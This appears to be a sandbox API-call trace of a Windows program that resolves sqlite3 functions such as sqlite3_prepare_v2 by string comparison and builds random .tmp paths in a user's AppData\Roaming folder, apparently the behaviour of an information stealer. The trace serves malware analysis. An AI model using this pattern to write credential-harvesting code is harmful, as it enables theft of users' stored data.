[0202.346] lstrcmpA (lpString1="sqlite3_backup_finish", lpString2="sqlite3_prepare_v2") returned -1 [0202.346] lstrcmpA (lpString1="sqlite3_backup_init", lpString2="sqlite3_prepare_v2") returned -1 [0202.346] lstrcmpA (lpString1="sqlite3_backup_pagecount", lpString2="sqlite3_prepare_v2") returned -1 [0202.346] lstrcmpA (lpString1="sqlite3_backup_remaining", lpString2="sqlite3_prepare_v2") returned -1 [0202.346] lstrcmpA (lpString1="sqlite3_backup_step", lpString2="sqlite3_prepare_v2") returned -1 [0202.346] lstrcmpA (lpString1="sqlite3_bind_blob", lpString2="sqlite3_prepare_v2") returned -1 [0202.346] lstrcmpA (lpString1="sqlite3_bind_double", lpString2="sqlite3_prepare_v2") returned -1 [0202.346] lstrcmpA (lpString1="sqlite3_bind_int", lpString2="sqlite3_prepare_v2") returned -1 [0202.346] lstrcmpA (lpString1="sqlite3_bind_int64", lpString2="sqlite3_prepare_v2") returned -1 [0202.346] lstrcmpA (lpString1="sqlite3_bind_null", lpString2="sqlite3_prepare_v2") returned -1 [0202.346] lstrcmpA (lpString1="sqlite3_bind_parameter_count", lpString2="sqlite3_prepare_v2") returned -1 [0202.346] lstrcmpA (lpString1="sqlite3_bind_parameter_index", lpString2="sqlite3_prepare_v2") returned -1 [0202.346] lstrcmpA (lpString1="sqlite3_bind_parameter_name", lpString2="sqlite3_prepare_v2") returned -1 [0202.346] lstrcmpA (lpString1="sqlite3_bind_text", lpString2="sqlite3_prepare_v2") returned -1 [0202.346] lstrcmpA (lpString1="sqlite3_bind_text16", lpString2="sqlite3_prepare_v2") returned -1 [0202.346] lstrcmpA (lpString1="sqlite3_bind_value", lpString2="sqlite3_prepare_v2") returned -1 [0202.346] lstrcmpA (lpString1="sqlite3_bind_zeroblob", lpString2="sqlite3_prepare_v2") returned -1 [0202.346] lstrcmpA (lpString1="sqlite3_blob_bytes", lpString2="sqlite3_prepare_v2") returned -1 [0202.346] lstrcmpA (lpString1="sqlite3_blob_close", lpString2="sqlite3_prepare_v2") returned -1 [0202.346] lstrcmpA (lpString1="sqlite3_blob_open", lpString2="sqlite3_prepare_v2") returned -1 [0202.346] lstrcmpA (lpString1="sqlite3_blob_read", lpString2="sqlite3_prepare_v2") returned -1 [0202.346] lstrcmpA (lpString1="sqlite3_blob_write", lpString2="sqlite3_prepare_v2") returned -1 [0202.346] lstrcmpA (lpString1="sqlite3_busy_handler", lpString2="sqlite3_prepare_v2") returned -1 [0202.346] lstrcmpA (lpString1="sqlite3_busy_timeout", lpString2="sqlite3_prepare_v2") returned -1 [0202.346] lstrcmpA (lpString1="sqlite3_changes", lpString2="sqlite3_prepare_v2") returned -1 [0202.346] lstrcmpA (lpString1="sqlite3_clear_bindings", lpString2="sqlite3_prepare_v2") returned -1 [0202.346] lstrcmpA (lpString1="sqlite3_close", lpString2="sqlite3_prepare_v2") returned -1 [0202.347] lstrcmpA (lpString1="sqlite3_collation_needed", lpString2="sqlite3_prepare_v2") returned -1 [0202.347] lstrcmpA (lpString1="sqlite3_collation_needed16", lpString2="sqlite3_prepare_v2") returned -1 [0202.347] lstrcmpA (lpString1="sqlite3_column_blob", lpString2="sqlite3_prepare_v2") returned -1 [0202.347] lstrcmpA (lpString1="sqlite3_column_bytes", lpString2="sqlite3_prepare_v2") returned -1 [0202.347] lstrcmpA (lpString1="sqlite3_column_bytes16", lpString2="sqlite3_prepare_v2") returned -1 [0202.347] lstrcmpA (lpString1="sqlite3_column_count", lpString2="sqlite3_prepare_v2") returned -1 [0202.347] lstrcmpA (lpString1="sqlite3_column_decltype", lpString2="sqlite3_prepare_v2") returned -1 [0202.347] lstrcmpA (lpString1="sqlite3_column_decltype16", lpString2="sqlite3_prepare_v2") returned -1 [0202.347] lstrcmpA (lpString1="sqlite3_column_double", lpString2="sqlite3_prepare_v2") returned -1 [0202.347] lstrcmpA (lpString1="sqlite3_column_int", lpString2="sqlite3_prepare_v2") returned -1 [0202.347] lstrcmpA (lpString1="sqlite3_column_int64", lpString2="sqlite3_prepare_v2") returned -1 [0202.347] lstrcmpA (lpString1="sqlite3_column_name", lpString2="sqlite3_prepare_v2") returned -1 [0202.347] lstrcmpA (lpString1="sqlite3_column_name16", lpString2="sqlite3_prepare_v2") returned -1 [0202.347] lstrcmpA (lpString1="sqlite3_column_text", lpString2="sqlite3_prepare_v2") returned -1 [0202.347] lstrcmpA (lpString1="sqlite3_column_text16", lpString2="sqlite3_prepare_v2") returned -1 [0202.347] lstrcmpA (lpString1="sqlite3_column_type", lpString2="sqlite3_prepare_v2") returned -1 [0202.347] lstrcmpA (lpString1="sqlite3_column_value", lpString2="sqlite3_prepare_v2") returned -1 [0202.347] lstrcmpA (lpString1="sqlite3_commit_hook", lpString2="sqlite3_prepare_v2") returned -1 [0202.347] lstrcmpA (lpString1="sqlite3_complete", lpString2="sqlite3_prepare_v2") returned -1 [0202.347] lstrcmpA (lpString1="sqlite3_complete16", lpString2="sqlite3_prepare_v2") returned -1 [0202.347] lstrcmpA (lpString1="sqlite3_context_db_handle", lpString2="sqlite3_prepare_v2") returned -1 [0202.347] lstrcmpA (lpString1="sqlite3_create_collation", lpString2="sqlite3_prepare_v2") returned -1 [0202.347] lstrcmpA (lpString1="sqlite3_create_collation16", lpString2="sqlite3_prepare_v2") returned -1 [0202.347] lstrcmpA (lpString1="sqlite3_create_collation_v2", lpString2="sqlite3_prepare_v2") returned -1 [0202.347] lstrcmpA (lpString1="sqlite3_create_function", lpString2="sqlite3_prepare_v2") returned -1 [0202.347] lstrcmpA (lpString1="sqlite3_create_function16", lpString2="sqlite3_prepare_v2") returned -1 [0202.347] lstrcmpA (lpString1="sqlite3_create_module", lpString2="sqlite3_prepare_v2") returned -1 [0202.347] lstrcmpA (lpString1="sqlite3_create_module_v2", lpString2="sqlite3_prepare_v2") returned -1 [0202.347] lstrcmpA (lpString1="sqlite3_data_count", lpString2="sqlite3_prepare_v2") returned -1 [0202.348] lstrcmpA (lpString1="sqlite3_db_handle", lpString2="sqlite3_prepare_v2") returned -1 [0202.348] lstrcmpA (lpString1="sqlite3_declare_vtab", lpString2="sqlite3_prepare_v2") returned -1 [0202.348] lstrcmpA (lpString1="sqlite3_enable_load_extension", lpString2="sqlite3_prepare_v2") returned -1 [0202.348] lstrcmpA (lpString1="sqlite3_enable_shared_cache", lpString2="sqlite3_prepare_v2") returned -1 [0202.348] lstrcmpA (lpString1="sqlite3_errcode", lpString2="sqlite3_prepare_v2") returned -1 [0202.348] lstrcmpA (lpString1="sqlite3_errmsg", lpString2="sqlite3_prepare_v2") returned -1 [0202.348] lstrcmpA (lpString1="sqlite3_errmsg16", lpString2="sqlite3_prepare_v2") returned -1 [0202.348] lstrcmpA (lpString1="sqlite3_exec", lpString2="sqlite3_prepare_v2") returned -1 [0202.348] lstrcmpA (lpString1="sqlite3_expired", lpString2="sqlite3_prepare_v2") returned -1 [0202.348] lstrcmpA (lpString1="sqlite3_extended_result_codes", lpString2="sqlite3_prepare_v2") returned -1 [0202.348] lstrcmpA (lpString1="sqlite3_file_control", lpString2="sqlite3_prepare_v2") returned -1 [0202.348] lstrcmpA (lpString1="sqlite3_finalize", lpString2="sqlite3_prepare_v2") returned -1 [0202.348] lstrcmpA (lpString1="sqlite3_free", lpString2="sqlite3_prepare_v2") returned -1 [0202.348] lstrcmpA (lpString1="sqlite3_free_table", lpString2="sqlite3_prepare_v2") returned -1 [0202.348] lstrcmpA (lpString1="sqlite3_get_autocommit", lpString2="sqlite3_prepare_v2") returned -1 [0202.349] lstrcmpA (lpString1="sqlite3_get_auxdata", lpString2="sqlite3_prepare_v2") returned -1 [0202.349] lstrcmpA (lpString1="sqlite3_get_table", lpString2="sqlite3_prepare_v2") returned -1 [0202.349] lstrcmpA (lpString1="sqlite3_global_recover", lpString2="sqlite3_prepare_v2") returned -1 [0202.349] lstrcmpA (lpString1="sqlite3_interrupt", lpString2="sqlite3_prepare_v2") returned -1 [0202.349] lstrcmpA (lpString1="sqlite3_last_insert_rowid", lpString2="sqlite3_prepare_v2") returned -1 [0202.349] lstrcmpA (lpString1="sqlite3_libversion", lpString2="sqlite3_prepare_v2") returned -1 [0202.349] lstrcmpA (lpString1="sqlite3_libversion_number", lpString2="sqlite3_prepare_v2") returned -1 [0202.349] lstrcmpA (lpString1="sqlite3_limit", lpString2="sqlite3_prepare_v2") returned -1 [0202.349] lstrcmpA (lpString1="sqlite3_load_extension", lpString2="sqlite3_prepare_v2") returned -1 [0202.349] lstrcmpA (lpString1="sqlite3_malloc", lpString2="sqlite3_prepare_v2") returned -1 [0202.349] lstrcmpA (lpString1="sqlite3_memory_alarm", lpString2="sqlite3_prepare_v2") returned -1 [0202.349] lstrcmpA (lpString1="sqlite3_memory_highwater", lpString2="sqlite3_prepare_v2") returned -1 [0202.349] lstrcmpA (lpString1="sqlite3_memory_used", lpString2="sqlite3_prepare_v2") returned -1 [0202.349] lstrcmpA (lpString1="sqlite3_mprintf", lpString2="sqlite3_prepare_v2") returned -1 [0202.349] lstrcmpA (lpString1="sqlite3_mutex_alloc", lpString2="sqlite3_prepare_v2") returned -1 [0202.349] lstrcmpA (lpString1="sqlite3_mutex_enter", lpString2="sqlite3_prepare_v2") returned -1 [0202.349] lstrcmpA (lpString1="sqlite3_mutex_free", lpString2="sqlite3_prepare_v2") returned -1 [0202.349] lstrcmpA (lpString1="sqlite3_mutex_leave", lpString2="sqlite3_prepare_v2") returned -1 [0202.349] lstrcmpA (lpString1="sqlite3_mutex_try", lpString2="sqlite3_prepare_v2") returned -1 [0202.349] lstrcmpA (lpString1="sqlite3_open", lpString2="sqlite3_prepare_v2") returned -1 [0202.349] lstrcmpA (lpString1="sqlite3_open16", lpString2="sqlite3_prepare_v2") returned -1 [0202.349] lstrcmpA (lpString1="sqlite3_open_v2", lpString2="sqlite3_prepare_v2") returned -1 [0202.349] lstrcmpA (lpString1="sqlite3_overload_function", lpString2="sqlite3_prepare_v2") returned -1 [0202.349] lstrcmpA (lpString1="sqlite3_prepare", lpString2="sqlite3_prepare_v2") returned -1 [0202.349] lstrcmpA (lpString1="sqlite3_prepare16", lpString2="sqlite3_prepare_v2") returned 1 [0202.349] lstrcmpA (lpString1="sqlite3_prepare16_v2", lpString2="sqlite3_prepare_v2") returned 1 [0202.349] lstrcmpA (lpString1="sqlite3_prepare_v2", lpString2="sqlite3_prepare_v2") returned 0 [0202.349] lstrcmpA (lpString1="sqlite3_aggregate_context", lpString2="sqlite3_column_text") returned -1 [0202.350] lstrcmpA (lpString1="sqlite3_aggregate_count", lpString2="sqlite3_column_text") returned -1 [0202.350] lstrcmpA (lpString1="sqlite3_auto_extension", lpString2="sqlite3_column_text") returned -1 [0202.350] lstrcmpA (lpString1="sqlite3_backup_finish", lpString2="sqlite3_column_text") returned -1 [0202.350] lstrcmpA (lpString1="sqlite3_backup_init", lpString2="sqlite3_column_text") returned -1 [0202.350] lstrcmpA (lpString1="sqlite3_backup_pagecount", lpString2="sqlite3_column_text") returned -1 [0202.350] lstrcmpA (lpString1="sqlite3_backup_remaining", lpString2="sqlite3_column_text") returned -1 [0202.350] lstrcmpA (lpString1="sqlite3_backup_step", lpString2="sqlite3_column_text") returned -1 [0202.350] lstrcmpA (lpString1="sqlite3_bind_blob", lpString2="sqlite3_column_text") returned -1 [0202.350] lstrcmpA (lpString1="sqlite3_bind_double", lpString2="sqlite3_column_text") returned -1 [0202.350] lstrcmpA (lpString1="sqlite3_bind_int", lpString2="sqlite3_column_text") returned -1 [0202.350] lstrcmpA (lpString1="sqlite3_bind_int64", lpString2="sqlite3_column_text") returned -1 [0202.350] lstrcmpA (lpString1="sqlite3_bind_null", lpString2="sqlite3_column_text") returned -1 [0202.350] lstrcmpA (lpString1="sqlite3_bind_parameter_count", lpString2="sqlite3_column_text") returned -1 [0202.350] lstrcmpA (lpString1="sqlite3_bind_parameter_index", lpString2="sqlite3_column_text") returned -1 [0202.350] lstrcmpA (lpString1="sqlite3_bind_parameter_name", lpString2="sqlite3_column_text") returned -1 [0202.350] lstrcmpA (lpString1="sqlite3_bind_text", lpString2="sqlite3_column_text") returned -1 [0202.350] lstrcmpA (lpString1="sqlite3_bind_text16", lpString2="sqlite3_column_text") returned -1 [0202.350] lstrcmpA (lpString1="sqlite3_bind_value", lpString2="sqlite3_column_text") returned -1 [0202.350] lstrcmpA (lpString1="sqlite3_bind_zeroblob", lpString2="sqlite3_column_text") returned -1 [0202.350] lstrcmpA (lpString1="sqlite3_blob_bytes", lpString2="sqlite3_column_text") returned -1 [0202.350] lstrcmpA (lpString1="sqlite3_blob_close", lpString2="sqlite3_column_text") returned -1 [0202.350] lstrcmpA (lpString1="sqlite3_blob_open", lpString2="sqlite3_column_text") returned -1 [0202.350] lstrcmpA (lpString1="sqlite3_blob_read", lpString2="sqlite3_column_text") returned -1 [0202.351] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f890, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0202.353] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0202.353] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2cd0000 [0202.354] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0202.354] lstrcpyW (in: lpString1=0x2cd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0202.354] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f890, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0202.354] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0202.354] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2ce0000 [0202.354] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0202.355] lstrcpyW (in: lpString1=0x2ce0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0202.355] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0202.355] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0202.355] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0202.355] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0202.355] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0202.355] lstrlenW (lpString="\\") returned 1 [0202.355] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0202.355] lstrlenW (lpString="\\") returned 1 [0202.356] lstrcpyW (in: lpString1=0x2dd0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0202.356] lstrlenW (lpString="\\") returned 1 [0202.356] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0202.356] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.356] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0202.356] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.356] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0202.356] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.357] GetProcessHeap () returned 0x900000 [0202.357] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8) returned 0x934878 [0202.357] lstrlenA (lpString="aIBiywy") returned 7 [0202.357] lstrlenA (lpString="aIBiywy") returned 7 [0202.357] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0202.357] lstrcpyA (in: lpString1=0x2d80000, lpString2="aIBiywy" | out: lpString1="aIBiywy") returned="aIBiywy" [0202.357] lstrlenA (lpString="aIBiywy") returned 7 [0202.357] lstrlenA (lpString="aIBiywy") returned 7 [0202.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2d80000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0202.357] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0202.358] lstrlenA (lpString="aIBiywy") returned 7 [0202.358] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2d80000, cbMultiByte=-1, lpWideCharStr=0x2dd0000, cchWideChar=18 | out: lpWideCharStr="aIBiywy") returned 8 [0202.358] lstrlenW (lpString="aIBiywy") returned 7 [0202.358] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0202.358] lstrlenW (lpString="aIBiywy") returned 7 [0202.358] lstrcpyW (in: lpString1=0x2df0000, lpString2="aIBiywy" | out: lpString1="aIBiywy") returned="aIBiywy" [0202.358] lstrlenW (lpString="aIBiywy") returned 7 [0202.358] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e00000 [0202.359] lstrcpyW (in: lpString1=0x2e00000, lpString2="aIBiywy" | out: lpString1="aIBiywy") returned="aIBiywy" [0202.359] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.359] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.359] lstrlenW (lpString="aIBiywy") returned 7 [0202.359] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0202.360] lstrcatW (in: lpString1="", lpString2="aIBiywy" | out: lpString1="aIBiywy") returned="aIBiywy" [0202.360] VirtualFree (lpAddress=0x2e00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.360] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.360] GetProcessHeap () returned 0x900000 [0202.360] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0202.360] lstrlenW (lpString="aIBiywy") returned 7 [0202.360] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0202.360] VirtualQuery (in: lpAddress=0x2de0000, lpBuffer=0x415f9cc, dwLength=0x1c | out: lpBuffer=0x415f9cc*(BaseAddress=0x2de0000, AllocationBase=0x2de0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.360] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0202.361] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.361] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="aIBiywy" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy" [0202.361] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.362] lstrlenW (lpString=".tmp") returned 4 [0202.362] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0202.362] lstrlenW (lpString=".tmp") returned 4 [0202.362] lstrcpyW (in: lpString1=0x2dd0000, lpString2=".tmp" | out: lpString1=".tmp") returned=".tmp" [0202.362] lstrlenW (lpString=".tmp") returned 4 [0202.362] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy") returned 53 [0202.362] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.362] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0202.362] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.363] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy", lpString2=".tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp" [0202.363] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.363] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0202.363] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0202.363] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0202.364] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0202.364] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0202.364] lstrlenW (lpString="\\") returned 1 [0202.364] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0202.364] lstrlenW (lpString="\\") returned 1 [0202.364] lstrcpyW (in: lpString1=0x2dd0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0202.364] lstrlenW (lpString="\\") returned 1 [0202.364] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0202.364] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.364] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0202.365] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.365] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0202.365] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.365] GetProcessHeap () returned 0x900000 [0202.365] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8) returned 0x934878 [0202.365] lstrlenA (lpString="eIdnomH") returned 7 [0202.365] lstrlenA (lpString="eIdnomH") returned 7 [0202.365] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0202.366] lstrcpyA (in: lpString1=0x2d80000, lpString2="eIdnomH" | out: lpString1="eIdnomH") returned="eIdnomH" [0202.366] lstrlenA (lpString="eIdnomH") returned 7 [0202.366] lstrlenA (lpString="eIdnomH") returned 7 [0202.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2d80000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0202.366] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0202.366] lstrlenA (lpString="eIdnomH") returned 7 [0202.366] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2d80000, cbMultiByte=-1, lpWideCharStr=0x2dd0000, cchWideChar=18 | out: lpWideCharStr="eIdnomH") returned 8 [0202.366] lstrlenW (lpString="eIdnomH") returned 7 [0202.366] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e00000 [0202.367] lstrlenW (lpString="eIdnomH") returned 7 [0202.367] lstrcpyW (in: lpString1=0x2e00000, lpString2="eIdnomH" | out: lpString1="eIdnomH") returned="eIdnomH" [0202.367] lstrlenW (lpString="eIdnomH") returned 7 [0202.367] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0202.367] lstrcpyW (in: lpString1=0x2e20000, lpString2="eIdnomH" | out: lpString1="eIdnomH") returned="eIdnomH" [0202.367] VirtualFree (lpAddress=0x2e00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.367] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.368] lstrlenW (lpString="eIdnomH") returned 7 [0202.368] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0202.368] lstrcatW (in: lpString1="", lpString2="eIdnomH" | out: lpString1="eIdnomH") returned="eIdnomH" [0202.368] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.368] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.369] GetProcessHeap () returned 0x900000 [0202.369] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0202.369] lstrlenW (lpString="eIdnomH") returned 7 [0202.369] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0202.369] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f9cc, dwLength=0x1c | out: lpBuffer=0x415f9cc*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.369] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0202.369] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.370] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="eIdnomH" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eIdnomH") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eIdnomH" [0202.370] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.370] lstrlenW (lpString=".tmp") returned 4 [0202.370] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0202.370] lstrlenW (lpString=".tmp") returned 4 [0202.370] lstrcpyW (in: lpString1=0x2dd0000, lpString2=".tmp" | out: lpString1=".tmp") returned=".tmp" [0202.370] lstrlenW (lpString=".tmp") returned 4 [0202.370] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eIdnomH") returned 53 [0202.370] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, 